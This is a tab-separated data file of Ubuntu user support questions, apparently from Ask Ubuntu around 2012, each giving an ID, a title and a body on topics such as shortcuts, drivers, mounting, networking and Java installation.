170835	ca n't assign super+l to lock screen	installed ubuntu 12.04 64bit today , switched to gnome classic ( no effects ) and there is one thing that makes me crazy : i ca n't assign super+l to lock screen function ! i go to system settings - > keyboard - > shortcuts - > system , then i click on lock screen and press `` super + l '' , it appears in the list but when i press it again it does n't work . if i set it back to ctrl+alt+l it works again . actually , i tried to set it to different super + ? ? combinations , and neither of them work . if i assign super+l to so other command , like start terminal , it works .
170836	how do i fix a `` user timeout caused connection failure '' error ?	i 'm following these instructions - how do i configure juju for local usage ? and all appears well until : juju deploy mysql - which gives 2012-08-01 16:14:58,560 info searching for charm cs : precise/mysql in charm store user timeout caused connection failure . 2012-08-01 16:15:28,592 error user timeout caused connection failure . ~/juju/samples/charms/ is empty . juju bootstrap completed within 10 secs which i suspect is not correct geme @ geme1 : ~ $ juju bootstrap 2012-08-01 16:13:11,878 info bootstrapping environment 'sample ' ( origin : distro type : local ) ... 2012-08-01 16:13:11,880 info checking for required packages ... 2012-08-01 16:13:12,525 info starting networking ... 2012-08-01 16:13:12,870 info starting zookeeper ... 2012-08-01 16:13:13,041 info starting storage server ... 2012-08-01 16:13:15,474 info initializing zookeeper hierarchy 2012-08-01 16:13:17,846 info starting machine agent ( origin : distro ) ... 2012-08-01 16:13:19,483 info environment bootstrapped 2012-08-01 16:13:19,487 info 'bootstrap ' command finished successfully status shows : geme @ geme1 : ~ $ juju status machines : 0 : agent-state : running dns-name : localhost instance-id : local instance-state : running services : { } 2012-08-01 16:13:28,304 info 'status ' command finished successfully geme @ geme1 : ~ $ juju -v status 2012-08-01 16:13:44,419 debug initializing juju status runtime 2012-08-01 16:13:44,522:2807 ( 0xb77abb00 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.5 2012-08-01 16:13:44,522:2807 ( 0xb77abb00 ) : zoo_info @ log_env @ 662 : client environment : host.name=geme1 2012-08-01 16:13:44,523:2807 ( 0xb77abb00 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2012-08-01 16:13:44,523:2807 ( 0xb77abb00 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.2.0-23-generic-pae 2012-08-01 16:13:44,523:2807 ( 0xb77abb00 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 36-ubuntu smp tue apr 10 22:19:09 utc 2012 2012-08-01 16:13:44,532:2807 ( 0xb77abb00 ) : zoo_info @ log_env @ 679 : client environment : user.name=geme 2012-08-01 16:13:44,535:2807 ( 0xb77abb00 ) : zoo_info @ log_env @ 687 : client environment : user.home=/home/geme 2012-08-01 16:13:44,535:2807 ( 0xb77abb00 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/home/geme 2012-08-01 16:13:44,535:2807 ( 0xb77abb00 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=192.168.122.1:59761 sessiontimeout=10000 watcher=0xd9f620 sessionid=0 sessionpasswd= < null > context=0x8a43440 flags=0 2012-08-01 16:13:44,545:2807 ( 0xb7483b40 ) : zoo_info @ check_events @ 1585 : initiated connection to server [ 192.168.122.1:59761 ] 2012-08-01 16:13:44,564:2807 ( 0xb7483b40 ) : zoo_info @ check_events @ 1632 : session establishment complete on server [ 192.168.122.1:59761 ] , sessionid=0x138e2bf765f0003 , negotiated timeout=10000 2012-08-01 16:13:44,573 debug environment is initialized . machines : 0 : agent-state : running dns-name : localhost instance-id : local instance-state : running services : { } 2012-08-01 16:13:44,599 info 'status ' command finished successfully with verbose flag : juju -vv deploy mysql 2012-08-02 17:37:52,895 debug initializing juju deploy runtime 2012-08-02 17:37:52,897 info searching for charm cs : precise/mysql in charm store traceback ( most recent call last ) : < br > failure : twisted.internet.error.timeouterror : user timeout caused connection failure . 2012-08-02 17:38:22,936 error traceback ( most recent call last ) : failure : twisted.internet.error.timeouterror : user timeout caused connection failure . user timeout caused connection failure . 2012-08-02 17:38:22,942 error user timeout caused connection failure .
170839	how i do remove windows ?	i have installed ubuntu onto my laptop and i am happy ! great stuff . how do i do away with ( uninstall ) windows xp altogether please ? also ... ..can ubuntu be installed onto my ecpc that is now redundant because of constant updates ? ! do i just reformat the drive and connect a cd player with the ubuntu iso on disk ?
170840	does anyone know where to get printer drivers ?	running lubuntu 12.04 my model is canon ip4850 , but anything resembling canon would be a good start . i did n't see anything looking remotely useful in the package manager . ideas ? checked for canon ip4800 was down the way though . printer is detected but does n't print . i managed to get it working by resetting it . works fine on 12.04
170846	mount to /dev/sdb1 without password	i am unable to mount a usb drive ( or sd card ) to my system without root access . when i plug in a usb drive , it is visible in the left column of nautilus , but when i click on it to open it , i receive the error message unable to mount 2.1 gb filesystem error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdb1 on /media/sdb1 i am able to mount the drive using sudo mount -w /dev/sdb1 , but this causes problems for operations such as creating startup discs , which requires unmounting and remounting the drive . i suspect this problem may be caused by the fact that when i upgraded from 11.10 to 12.04 , i had an sd card plugged in . this caused the system to stall during later startups , as it could not find this drive . i remedied this by editing a line of /etc/fstab to read /dev/sdb1 /media/sdb1 vfat noauto 0 0 however , i am dual booting ubuntu with windows xp , and i have no problem mounting the c : drive of the windows system without root access , so i feel that this is a problem related to the mount point rather than mounting in general .
170849	how to make the dash button go straight to the applications menu ?	when i click the dash home button on the left bar near the top it opens a window up with the home tab by default , how can i change it to the applications tab by default instead ? . i 'm using 12.04
170850	dns not working over dsl	i connect to internet via a pppoe connection that i configured manually as below : /etc/ppp/peers/hamyar # hamyar : noipdefault defaultroute replacedefaultroute hide-password noauth persist plugin rp-pppoe.so eth0 user `` ******** '' usepeerdns when i connect via `` pon hamyar '' everything works fine ( i have ping response from any ip ) except pinging to names like google.com and i can not open it from my browser . what shall i do ? here 's log information : connected to 00:09:44:6c : e8:1a via interface eth0 using interface ppp0 connect : ppp0 < -- > eth0 pap authentication succeeded peer from calling number 00:09:44:6c : e8:1a authorized replacing old default route to eth0 [ 192.168.1.20 ] local ip address 178.173.139.142 remote ip address 80.191.122.18 primary dns address 80.191.122.5 secondary dns address 4.2.2.1
170851	how can i get bigger ubuntu logo at the top menu in 11.04	i have made my panel bigger and all the icons also get bigger except one , the logo on the left of the main menu that says `` applications places system '' . is there a way to make that logo/icon the same size as the other icons on panel ? i 'm running ubuntu 11.04 and gnome not unity .
170852	ntfs partition not clearly unmounted please help	when ubuntu boots , i get this error : the ntfs partition was not cleanly unmounted . this probably indicates that the system was not shut down properly . please run chkdsk /r from windows ; once that is fixed you should be able to resume the installation . press ok to reboot . i tried that and nothing special happened ( except that error again ) . what should i do ?
170859	customize color of selection rectangle when clicking-and-dragging on desktop	when i click and drag on my desktop it shows an orange box , however my my color scheme is blue , so how can i change the rectangle 's color to blue to match ? please . i 'm using 12.04 . i would like too see customization made easier in future releases please .
170864	how do i configure the update manager to sync daily unless connected on mobile broadband ?	my mobile internet provider limits network speed after 1gb of transfer . is it possible to prevent ubuntu from checking for updates automatically if connected on mobile broadland ? it would be fantastic if it only checked for updates daily when connected on wifi or ethernet , but never when connected on mobile broadland .
170868	locking wine applications in the launcher is not permanent	i happily run word 2007 via wine on my ubuntu 12.04 desktop . i prefer having it sit in the launcher for easy access , however , every time i start a new session ( that is , logging in or booting up ) , the word launcher has disappeared . could this be a bug or am i doing something wrong ?
170869	is there any way to use my samsung galaxy s3 as usb modem on ubuntu pc ?	ive already installed nautilus and i can mount both my internal and external memories on my ubuntu pc , but i could n't find how to use my samsung as modem . is it possible ? btw , my most sincerest despite to samsung for not including drivers for free software .
170874	upgrading from 11.04 ( 32bit ) to 12.04 ( 64bit )	i 'm upgrading from 11.04 i386 to 12.4 64x . what i mean is i 've installed the 12.4 64x server and i want to get all the settings from the 11.04 to set up the 12.4 , the settings i 'd like to get are for apache / php / phpmyadmin etc . any and all settings that have to do with the web server . what files should i get or what path should i take here ? any suggestions would be great .
170880	how do i install the drivers for my samsung printer ?	i have a samsung clp-325w printer . i downloaded the .tar.gz file from their website , but i ca n't seem to figure out how to install it . here 's the link to the driver 's tarball i 've been following this guide to install it , but i get stuck at the ./configure command . it says bash : ./configure : no such file or directory what am i doing wrong ? if i 'm in the wrong folder , which folder is the correct one ? i should note that i was able to install the drivers via ubuntu 's generic drivers , but i 'd really like to know how to do this for future and also to make sure i have the latest drivers .
170881	reopen a closed gui of a running program	when i use truecrypt or skype gui and then ( by mistake ) push the x button to close it i can still see they are running ( using ps-e ) . in the case with skype i can even see i am logged in . if i try to reopen it i will get a new instance . in the case with truecrypt i ca n't even reopen the gui since it says `` truecrypt is already running '' ( not literally ) . in these cases , is there a way to bring up the gui of a program that is already running , using unity or command-line ? right now i simply kill the process and restart it .
170886	how do i open an application in a specific workspace ?	how do i open an application in specific workspace ? compizconfig-settings-manager does n't seems work in 12.04 : (
170889	is there an application that wraps a website in itself ?	i am looking for an application that is configurable to open a website on a certain address , having the website 's logo as logo in the launcher , without the browser bar , so i can run the website as if it were an application . this is preferable for me to opening the website in the browser itself ( you 'll have to enter the address , or ctrl-tab to the right tab , alt-tab to the right window ) . thanks in advance for any advice . advice how to customize browsers to do just what i want in this sense is also appreciated .
170891	mail delivery system and gmail error	after following the following tutorial : http : //blog.seeit.org/2010/08/php-mail-with-ubuntu-desktop-and-gmail/ in order to send email through gmail . i get the following error : mail delivery system mailer-daemon @ 12:38 am ( 20 hours ago ) to me this is the mail system at host . i 'm sorry to have to inform you that your message could not be delivered to one or more recipients . it 's attached below . for further assistance , please send mail to < postmaster > if you do so , please include this problem report . you can delete your own text from the attached returned message . the mail system < root @ smartlab.cs.ucy.ac.cy > ( expanded from < `` root @ domain > ) : delivery temporarily suspended : connect to domain [ ip ] : no route to host final-recipient : rfc822 ; root @ domain original-recipient : rfc822 ; root @ domain action : failed status : 4.4.1 diagnostic-code : x-postfix ; delivery temporarily suspended : connect to domain [ ip ] : no route to host -- -- -- -- -- forwarded message -- -- -- -- -- from : root < username @ gmail.com > to : root cc : date : mon , 30 jul 2012 00:20:01 +0300 subject : cron < smmsp @ machine > test -x /etc/init.d/sendmail & & /usr/share/sendmail/sendmail cron-msp /usr/share/sendmail/sendmail : 1267 : /usr/sbin/sendmail-msp : not found does anyone know how to fix that ?
170894	weather indicator stuck on `` refreshing ''	i 've tried uninstalling and reinstalling weather indicator , but it 's stuck on `` refreshing , please wait '' for the current temperature . everything else seems to work . there have been updates several times over the past week or so , and it was just a few days ago that i noticed the problem . i 'm running ubuntu 12.04 lts with no extra themes .
170896	i have a problem booting ubuntu 9	i have installed ubuntu 9 on an asus motherboard , i 3 , from a disc ; it is installed along with windows . now i have 2 problems : a ) i can not boot into linux without changing the sata setting in the bios to anci and i have no internet connectivity also in ubuntu mode . b ) to boot into linux i have to change the bios sata setting back to ide and boot to windows ; then my internet connection works fine . any help would be appreciated !
170898	which nvidia driver from additional drivers option should i choose ?	i have nvidia geforece 7025 / nforce 630a integrated gfx card on my ubuntu 12.04.and i have 4 options in additional drivers : nvidia accelerated graphics driver ( version 173 ) nvidia accelerated graphics driver ( post-release updates ) ( version current updates ) nvidia accelerated graphics driver ( version current ) [ recommended ] nvidia accelerated graphics driver ( post-release updates ) ( version 173 updates ) i am currently using the first option . my problem is there i ca n't update the version 173 to the latest version of drivers using xswat ppa . whenever i do it and reboot but the nvidia xserver sttings always shows me the same version . which option would allow me to update my drivers to the current version ?
170900	is there any way to diagnose or debug my unity problems ?	unity is really buggy for me ! i mean really buggy . even while just typing the title of this it shut down and restarted itself . it does n't always restart itself though . a little while earlier , unity just stopped hiding and was constantly overlayed on everything . covering up back buttons and other options on the left side . i restarted it . before that it was having a weird compositing bug where the background was black while using it . i restarted the computer to fix that . but the biggest issue is the constant crashing . while using it , or even for no reason it just freezes and then crashes . now i 'm not here to complain for no reason . because i actually really really like unity . in fact i 've tried cinnamon and gnome-shell and i always come back to unity . and that should be a testament to it that i still prefer it through all its bugs . so i 'm asking , is there any wikis or log files i can use to diagnose the problem myself . because i 've asked people online to help and everyone seems to be at a loss . maybe i have some wrong variable set in some configuration file . or at least find out what 's going on . i just want unity to be stable again like it was when i first installed ubuntu . [ update ] by the way i was able to find these three errors when running `` compiz -- replace '' from the console . warn 2012-08-01 13:19:53 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application1339296950 ( compiz:10636 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ( compiz:10636 ) : glib-critical ** : g_hash_table_remove_internal : assertion `hash_table ! = null ' failed it segfaults after this . `` segmentation fault ( core dumped ) '' i 've tried reinstalling desktop-ubuntu and unity -- reset , but it still happens
170902	how do i allocate more memory to chrome ?	i am trying to play a browser based game on chrome . my system runs ubuntu fine and is a new laptop . the game gets choppy when i play . how do i allocate a little more memory to chrome so i have some more browser-power to play this game ?
170907	how to automatically renew dhcp ip ?	i have a headless server on my network ( actually it 's just running ubuntu desktop 10.04 ) that for some reason is n't automatically renewing its dhcp lease when it gets reconnected to the network . how do i fix this ? some more info : the router our systems are connected to has been going down and coming back up occasionally , in the span of a second . the other ubuntu 10.04 boxes seem to handle this fine - within a second , they 're connected again . it 's just this one box that does n't seem to be behaving . it 's annoying because every time this happens i have to go to the server and reconnect a monitor ( or at the very least a keyboard ) just to run sudo dhclient . $ pgrep networkmanager 1014 $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid
170911	trouble mounting an sd card	while attempting to mount and sdcard from /dev/sda/ mount /dev/sda /media i get an error vfs : ca n't find ext4 filesystem mount : you must specify the filesystem type any ideas ?
170912	can someone give me a better idea of what i did when i installed ubuntu ? it 's working but strangely	i decided to dual boot ubuntu 12.04 alongside my windows 7 install . i 'm on a toshiba satellite a665-s6050 if it matters , windows 7 64-bit , 500 gb hdd . i partitioned 80 gb of free space to install ubuntu in . struggled with the manual partitioner since the auto install thing was n't showing up . using various goggled tutorials , i made two partitions out of the free space , a swap partition about 2 gb in size and the other 78 gb partition , with mount point of `` / '' and tried installing . it installed , but when i booted again , it would only boot into windows . so i tried running the install again , and this time it gave me the `` install alongside other operating system '' and when i clicked that instead of giving me the slider bar where i allocate space , it went straight to install . it is now working , and i 'm dual booting , but now when i boot into windows , everything is as expected , my c : drive is 80 gb smaller . but when i boot into ubuntu , it gives me access to my entire hdd , even the windows files , and i 'm not sure why . did i limit ubuntu to 80 gb or did i only limit windows 7 ? i 'm thoroughly confused , it did not go as smoothly as it has when i 've done clean installs of ubuntu before on other computers . this was my first dual boot and it was a pain .
170914	how can i make a .deb file from a bash script ?	i 've made a bash script and stored it in /usr/local/bin . in the future , i 'd like to get this bash script in /usr/local/bin again by just installing a .deb file . how can i get this done ?
170916	how do i get unity-greeter to run ?	i want to be able to access alternatives to unity as it really slows things down with only 2gb of memory . i thought that if i could get unity-greeter to run that i 'd have a choice .
170920	how to restore fonts after kubuntu-desktop ?	i 've installed and deleted kubuntu-desktop just to look what kde is , and so on , and now even in unity some fonts are totally ugly : ( specially in firefox , i have real eyeache after reading sites with these fonts . how to restore them like it was before ?
170921	changing ownership of usr , resulting on graphics and sudo not working anymore	i made a massive mistake by recursively changing the user of every file under /usr . i ca n't boot my laptop by any normal means following this mistake , and i 'm looking for a way to revert the effects of it . in order to tackle this problem i started my computer on recovery mode and switched to console as root . my original idea was to change the owner of /usr ( and all files under it ) back to root . i tried : chown -- recursive root /usr chown -hr root /usr sadly this results on all folders under the usr saying read-only file system , a sample line would be : chown : changing the ownership of '/usr/bin/ ... ' : read-only file system i 'm not sure whether there has been no change at all , or i should n't refer to root as 'root ' on the above line . besides this , i have tried a few other things that i found here and there but i was unable to revert the effects of my mistake . i would be grateful if anyone can point me towards any solution . it would also be very kind of you to mention why it was so wrong to change the owner of the contents under usr , considering that i 'm the only user in this operating system . thanks in advance for your time .
170924	installing java in ubuntu 12.04 64 bit ( chrome issue )	i 'm trying to get java to run in chrome 21.0.1180.57 to no avail . i 've installed everything with the word java from the software center and even the restricted-extras package . chrome keeps saying icedtea is out of date and i should update it ( chrome : //plugins reports a critical security update ) . if i click run this time it says it could n't load the plugin ... icedtea-web plugin ( using icedtea-web 1.2 ( 1.2-2ubuntu1.1 ) ) .. so i refresh , click the link provided by chrome to update java , download the file , unzip it and run ./configure . then i get the following error : ... checking for mozilla ... no configure : error : package requirements ( mozilla-plugin ) were not met : no package 'mozilla-plugin ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables mozilla_cflags and mozilla_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . i 've tried installing mozilla-plugin but it does n't exist , i 've installed other packages with similar names ( ie : mozilla-plugin-gnash ) but still ca n't proceed with the installation . java -version gives : java version `` 1.6.0_24 '' openjdk runtime environment ( icedtea6 1.11.3 ) ( 6b24-1.11.3-1ubuntu0.12.04.1 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) this guy is reporting the same issue and has had no answer yet . any ideas ? edit : i followed this instructions to install java manually but got an error in the last step sudo ln -s /opt/oracle-jre/jrexxxxx/bin/java /usr/bin/java because the file /usr/bin/javaalready exists . so i go to /usr/bin/ and i see a java link that points to /etc/alternatives/java which is also a link pointing to /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java . now in the folder /usr/lib/jvm/ i also have a java-7-openjdk-amd64 folder so , should n't the system be using this one ( 7 ) instead of the old one ( 6 ) ? perhaps i should fix this link ? edit 2 : i tried the solution posted here among many many others and still nothing .
170926	how can i backup my system to an usb stick ?	i would like to backup my disk , i 'm using only 24gb , but the full partition size 255gb . i would like to backup the whole system to an 32gb flash drive , just in case if the system it 's not working , i still can boot from the usb stick , how can i do that ? in this case is dd a good option ?
170927	installing windows 7 on pre-existing ubuntu 12.04 for dual-boot faq ?	i just wanted to ask a few questions before i completely destroy my system . my system currently has ubuntu12.04 on it , i have 100gb of unallocated space where the plan is to install a fresh copy of windows 7 for dual-boot purposes . how can i be sure that when i re-boot into the windows cd , the correct partition is chosen ? and ubuntu partition is safe/ wont be overwritten ? would this be the correct way of doing it ? : create a free partition with gparted install windows and reboot into ubuntucd live session install and run boot-repair boot again , grub will display windows and ubuntu . it seems a little straight forward , am i missing something ? what are the common mistakes people make and is there anything i should watch out for ? also after reading around , i find there is more than one way of achieving this . i read somewhere that you can also take the windows iso and put it into the boot folder ? then somehow configuring grub options ... any suggestions and advice is strongly appreciated ! cheers
170930	worthy istat equivalent	i 'm looking for an istat equivalent for ubuntu that can do the following : show my current cpu usage in the top bar ( preferably only 1 for my both cores combined ) show my current up- and download speed in the top bar show my current ram usage in the top bar give more detailed information when one of the indicators is clicked more important : show cpu and battery temperatures i 'm running the latest ubuntu version and will always be . here is a screenshot of how it looks on my mac :
170931	let gnome-shell act like unity by searching files or pressing alt-key	i almost like the gnome-shell and would love it , if this is possible : searching windows , applications and files when pressing the super key searching the menu when pressing the alt key this is possible in unity but i do n't want to fallback to that slow one . so how is this solveable in gnome-shell ?
170932	no-ip 2 install in ubuntu 12.04 no targets specified and no makefile found . stop	i am trying to install noip2 . after following these instructions i have reached a roadblock . how do i install the 'no-ip ' package on 12.04 ? when i type in make i receive the following error . make : *** no targets specified and no makefile found . stop . how do i fix this ?
170933	hibernation/suspend - nvidia/nouveau - tried everything , still not working , any idea ?	having tested all the solutions that i could find on the net , i try my luck here : i use precise pangolin , version 32bit kernel with pae symptoms : suspend goes well , but on resume , my screens remain on standby , the pm-suspend logs do not indicate anything special . hibernation : everything seems to run fine , the message indicating the creation of the image is displayed briefly , monitors go into standby , but the machine does not poweroff , on the contrary , the fans speed up , manual forced poweroff is the only solution , and at reboot , there is no resume . hardware configuration : graphics card : nvidia 8600 gts ( using the nouveau driver ) motherboard : asus m5a88-m-evo 8g of ram , 10g swap . things i tried : installing the nvidia proprietary driver : partially solves the problem ( suspend is functional , correct extinction but not resume ( monitors stay off ) for hibernation ) , but unstable system , hibernation is not useful if one need to reboot that often , impossible to work . uninstalling kvm / vmware / virtuabox that were installed . no change . compile linux 3.5 with nouveau driver and libdrm ( all this from freedesktop.org git repositories ) , it works very well , but no change for suspend/hibernate . adding nomodeset kernel options at boot , i lose 3d acceleration ( unity 2d ) , and no improvement . installing the script to disable usb ports to hibernation , no change . updated bios , no change . forcing the bios in s3 mode for hibernation , no change . launch pm-suspend manually with all the possible quirks options , no change changing the method of shutdown of pm-hibernate from `` plateform '' to `` shutdown '' ( no change ) reformat the swap partition ( swapoff/mkswap/swapon/fstab edition/edition /etc/initramfs-tools/conf.d/resume ) , no progress , get a new warning message about the uuid used , i may have forgotten something here . installing hibernate/uswsup/tuxonice , and uninstall them , no change in any case ... added `` resume=/dev/sda4 '' ( my swap partition ) to the line of the boot , no change . added `` noacpi '' to boot kernel line , no change . added `` acpi=force '' to boot kernel line , no change . i think that 's all , but i spent several evenings on the above , i may have forgotten some of itâś i would really , really like to make it work , suspend or hibernate , if anyone has a solution or even more trails to explore , my gratitude is great ... ( yes , i can pay for beers if you are in paris or you come by there ^^ ) . lsmod : http : //paste.ubuntu.com/1124079/ lshw : http : //paste.ubuntu.com/1124082/
170941	is there a bug with restart in edubuntu 12.04	after a clean install of edubuntu 12.04 on an acer ao531-h netbook , restart does n't work . the process starts normally but just before it shuts down the netbook freezes and i have to force shut down . the command `` sudo reboot '' has the same problem . i have no issues with shut down , only with restart . i 'm absolute beginner . netbook specs : acer , intel atom cpu n270 @ 1.60ghz , 1.05 ghz 0.98gb ram dual booting with windows xp . no problems with windows .
170944	mounting the hard drive when booting from a cd	is it possible to mount the hard drive when booting from a cd ? if so , how can i achieve this ?
170948	weird screen when i attempt to boot ubuntu from a usb hard drive	i tried to install ubuntu to an external hard drive ( wd my book essential 1.5tb ) . the live cd loaded fine , and i choose custom install . i made 2 primary partitions for root ( / ) and boot ( /boot ) and a logical partition for the swap space . i 'm pretty sure i installed grub into the external drive . i then booted into windows 7 and configured the rest of the space left on the drive as an ntfs partition to later backup my windows 7 . however , when i tried to boot ubuntu from the external drive i got a black screen with green lines going down . in the green lines were ( what looked like ) percentage signs . i assume this is fairly rare because its never happened to me before . my computer would n't do anything from there , and i had to force shut-down . this happened twice , and then i went back to windows . the ntfs partition still works fine , so i doubt its the drive . does anyone know what i can do to fix this or what mistakes i may have made during installation ? any help would be appreciated . thanks edit : i got it so that the screwed up screen is gone but now it 's just a blank black screen and no boot . also , i tried using the grub menu , but it does n't seem to want to come up no matter what i do or what keys i press . could it be a problem with the location grub is installed to ?
170950	is there a way to theme the notifications in xfce ?	i 'm kinda bored of how they look and the fact that there 's only 3 themes to choose from is even worse , so i was wondering if there is a way to theme the notification bubbles of xfce ? .
170955	sound settings panel empty on 12.04	after trying to fix my subwoofer problem sound indicator icon is always showing dashes and sound settings panel is empty ( no audio profiles available , screen attached ) . strange that the sound itself is working , i am able to play files . i tried to google but could n't find the solution . any ideas ?
170956	wifi connection	i recently downloaded a ubuntu operating system dual booting with my windows 7 . when i tried to connect to the internet on ubuntu , it asked my password , closed , reopened , and asked for it again . this is a continuous process and i cant connect to the internet .
170957	how do i bypass the license page to download oracle/sun java on a server with wget ?	i 'm trying to install liferay on ubuntu server 12.04 , which requires jre and recommends version 6 . i ca n't find jre6 in an authoritative repository , and i ca n't work out how to get past the licence agreement for a manual ( wget ) download . can i add a value to wget to accept the oracle licence agreement and download the file ? thanks
170961	pygtk dialog and return id/info	i am writing an app with quickly-pygtk-glade and i want to show a dialog and get the return id ... i used the run ( ) method but if a close the dialog and reopen it i get an empty window and some errors ! i was using destroy ( ) to close it.. then i tried to use show ( ) method , but i can get a return value from using id = dialog.show ( ) how can i get the return id ? also , how can i get the text from some entry in the dialog from the main code ?
170963	mouse button to raise+move a window	i used to be able to use super+mouse1 both to move a window and to raise the window on click . when i upgraded to 12.04 gnome-panel , it lost this functionality and i was forced to map f1 to raise a window . now i am auditing unity . i have disabled click-to-raise and auto-raise behavior as i would rather have control over which windows are raised when . i am not aware of a way to map the mouse thusly , but i would be happy to hear that it is possible .
170964	how to get the asus n13 wireless adapter to work ?	i have absolutely no clue how to make this work ! the disk that comes with it has instructions which do n't support my kernel . how can i make this work ? how do i get a correct driver for this and how do i install it ?
170969	java uses 100 % cpu and can not be stopped	i 've encountered that the java-process is started without any reasing ( while no java-application should be run ) and after a while uses 100 % of the cpu ( amd phenom ii x4 ) i kill it with the gnome system monitor . after some seconds , the process appears again , using again 100 % of cpu ( status : sleep ) . i 'm also irritated about the fact , that $ jobs does not return anything . i 'll tried sudo jobs for fun and got the message sudo : jobs : command not found but jobs of course is installed . i have installed openjdk java 6 runtime via the software center . how can i find out if there is still a programm running which uses java why the process takes that much cpu ?
170970	finding and editing gnome terminal colors without gui	i like the color scheme editor for the gnome terminal and all , but i hate not being able to work with color values , whether it be hexidecimal or some other form . how do you find out the color values of your profile 's theme and is there a file somewhere where you can edit these ?
170971	install quota stuck on repquota	i want to use group-quota on my ubuntu 12.04 lts server . i 've start with the following steps : $ apt-get install quota edit /etc/fstab proc /proc proc defaults 0 0 none /dev/pts devpts gid=5 , mode=620 0 0 # /dev/hda1 during installation ( rescuesystem ) uuid=9f906035-68d3-4066-9d58-2b070298e175 none swap sw 0 0 # /dev/hda2 during installation ( rescuesystem ) uuid=467ed71a-2c16-4b17-9a25-2b2962cf2431 /boot ext3 defaults 0 0 # /dev/hda3 during installation ( rescuesystem ) uuid=1f06497c-cd88-6f4d-a10b-8d30b7646adb / ext4 defaults , grpquota 0 0 reboot my server . $ quotacheck -avg quotacheck : can not remount filesystem mounted on / read-only so counted values might not be right . please stop all programs writing to filesystem or use -m flag to force checking . so i try $ quotacheck -avgm quotacheck : scanning /dev/disk/by-uuid/1f06497c-cd88-6f4d-a10b-8d30b7646adb [ / ] done quotacheck : old user file name could not been determined . usage will not be substracted . quotacheck : can not stat old group quota file //aquota.group : no such file or directory . usage will not be substracted . quotacheck : checked 29572 directories and 309976 files quotacheck : old file not found . restart quota service $ /etc/init.d/quota restart and now i stuck here $ repquota / repquota : not all specified mountpoints are using quota . where is my mistake ? thanks
170973	some of my favorite resolutions have disappeared from the `` display '' tool in unity	i tried to clean my pc and re-connect every cable again and in restarting it i noticed that the resolution had changed . i then tried to return to my favorite resolution ( 9:16 ) again and i found that it had disappeared . for your information my vga card is built in . i hope you can discover some kind of solution for my problem .
170983	how do i install/upgrade to kde 4.9 ?	recently kde released kde 4.9 , i wan na test it from my ubuntu 12.04 . how to to install kde 4.9 in ubuntu ? is there any ppa available
170998	how do i apply this patch/fix ?	i need to fix this problem i have with my mouse when playing games and i do n't know how to apply this patch . http : //cgit.freedesktop.org/xorg/xserver/commit/ ? id=2d4fda4b09e67e47d3e6fc4743fc6e81bfe40f28 any help would be nice . thanks .
171001	i have multiple `` none '' partitions , why ?	when i type `` df -h '' in my terminal , the following is the output : filesystem size used avail use % mounted on /dev/sda1 38g 7.1g 29g 20 % / none 498m 248k 497m 1 % /dev none 502m 1.1m 501m 1 % /dev/shm none 502m 104k 502m 1 % /var/run none 502m 0 502m 0 % /var/lock none 502m 0 502m 0 % /lib/init/rw fwiw , this is a vm image running ubuntu 10.04.4 ... what 's up with all the none partitions , and how can i combine them all ( assuming they 're not needed ) ?
171004	ca n't curently log in as user in ubuntu 12.04	after the installation of ubuntu 12.04 was finished , i was told to reboot my system . when it came backup , and after i logged in on the login screen , nothing happens , like its stuck there . i waited for a long time , and i ca n't login onto my machine . why ? any help would be great .
171009	problems encountered while updating from 11.10 to 12.04	i am a ubuntu 11.10 user and my update manager does n't show the availability of the new 12.04 release . what should i do in order to upgrade my system ?
171011	piratunbu theme 2.0 for 12.04 ?	i would really love to have this theme but cant seem to find where to get it at ? does anyone have it or know how to get it for 12.04 ?
171018	problems with the chroot command	i am a beginner and i need some help with chroot . my system files are in /dev/sdc1 . my swap is /dev/sdc2 . my home partition is /dev/sdc3 . i booted up the live ubuntu cd . i went to a command line . i guess , i need to mount /dev/sdc1 where my systems files are at . i tried sudo mount /dev/sdc1 /mnt and i got a message . `` more filesystems detected . this should not happen . use -t to explicitly specify the file system type . '' i am not sure what this means . what should i do to mount /dev/sdc1 ? i am trying to update grub so ubuntu 12.04 will boot up . i believe the kernel is missing and that is why grub ca n't find it . i used this link at https : //help.ubuntu.com/community/grub2/installing # chroot any help would be great !
171021	i added `` notify-send hi user '' to startup command but it is not working . how can i make it work ?	if i put `` notify-send hi user '' in terminal it shows notification . but when the same command is put into startup applications it does not work . i want to use this in my qt application
171022	how to turn off updates for rhythmbox	as of today ( 8/5/12 ) , i tried both suggestions , and it does not seem to work . i have even tried re-starting my computer , and it does n't seem to work . i originally asked a question about how to un-install rhythmbox ... in that question , i also asked how do i turn off updates for rhythmbox ... that never got answered . when i updated from ubuntu 11.10 to ubuntu 12.04 , you guy 's replaced banshee with rhythmbox ... well , i like banshee better , so when i uninstalled it , next time update manager opens , it gives me a bunch of `` updates '' for rhythmbox ... which includes re-installing it ... how do i stop this ? thanks !
171024	is there any way to program using objective c on ubuntu ?	is there a ide , library that could allow me to code objective c on ubuntu ?
171026	how to install all existing media codecs ?	how to install all possible media codecs from console ? is there a way to load and save them for some cases without internet connection ? thanks in advance !
171028	how to search within pdf and other documents , other than simple text , preferably using a gui ?	is this possible in principle ? it seems to me that search tools like gnome-search-tool , catfish and searchmonkey can search within text files , but not within other more complex documents like pdf or with extensions handled by libreoffice . am i missing something here ? are there programs that could achieve that ?
171034	alt + tab not working properly	alt+tab functionality has suddenly started misbehaving . it 's showing only desktop and the current active app instead of all the applications opened . for eg currently , opened applications are firefox and terminal but when i press alt+tab i can see either `` desktop + firefox '' or `` desktop + terminal '' depending upon whether the current active application is browser or terminal . i have not installed any update . please help .
171037	where can i find api reference documentation ?	where can i find a complete api reference ? i 'm not sure where to get started beyond what was shown in the quickly video with jono bacon
